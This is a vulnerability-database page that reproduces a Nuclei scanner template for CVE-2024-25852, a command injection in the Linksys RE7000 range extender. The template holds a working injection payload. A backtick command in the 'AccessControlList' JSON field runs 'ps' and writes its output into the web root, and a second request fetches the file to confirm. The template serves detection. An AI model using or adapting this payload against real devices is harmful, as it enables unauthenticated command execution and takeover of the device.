Lucene search
K

Linksys RE7000 - Command Injection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 71 Views

Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 command injection in "AccessControlList" paramete

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-25852
22 Apr 202401:02
circl
CNNVD
Linksys RE7000 安全漏洞
11 Apr 202400:00
cnnvd
CNVD
Linksys RE7000 Command Injection Vulnerability
15 Apr 202400:00
cnvd
CVE
CVE-2024-25852
11 Apr 202400:00
cve
Cvelist
CVE-2024-25852
11 Apr 202400:00
cvelist
NVD
CVE-2024-25852
11 Apr 202421:15
nvd
OSV
CVE-2024-25852
11 Apr 202421:15
osv
Positive Technologies
PT-2024-21165 · Linksys · Linksys Re7000
11 Apr 202400:00
ptsecurity
RedhatCVE
CVE-2024-25852
23 May 202510:12
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-25852
22 May 202400:00
vulncheck_kev
Rows per page
id: CVE-2024-25852

info:
  name: Linksys RE7000 - Command Injection
  author: s4e-io
  severity: high
  description: |
    Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: An attacker can use the vulnerability to obtain device administrator rights.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-25852
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md
    - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd
  classification:
    epss-score: 0.16519
    epss-percentile: 0.966
  metadata:
    verified: true
    max-request: 1
    vendor: Linksys
    product: RE7000
  tags: cve,cve2024,unauth,injection,vkev,vuln

variables:
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        PUT /goform/AccessControl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"}

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")'
          - "status_code_1 == 200 && status_code_2 == 200"
        condition: and
# digest: 4a0a004730450221009f3748d5496cfc693c6e4a0321ff13287a4781de8254218eb344979c0241958a02205916c21a88391b978f4cc5fd7530e599c0cebc358d4e786221a661ebec191fdf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.18.8
EPSS0.16519
SSVC
71